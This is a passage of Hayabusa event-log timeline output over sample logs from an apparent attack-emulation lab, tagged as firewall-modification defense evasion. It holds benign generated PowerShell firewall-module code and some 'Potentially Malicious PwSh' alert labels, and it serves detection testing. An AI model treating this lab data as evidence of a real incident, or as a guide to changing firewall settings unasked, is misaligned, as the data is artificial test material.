(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.533 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 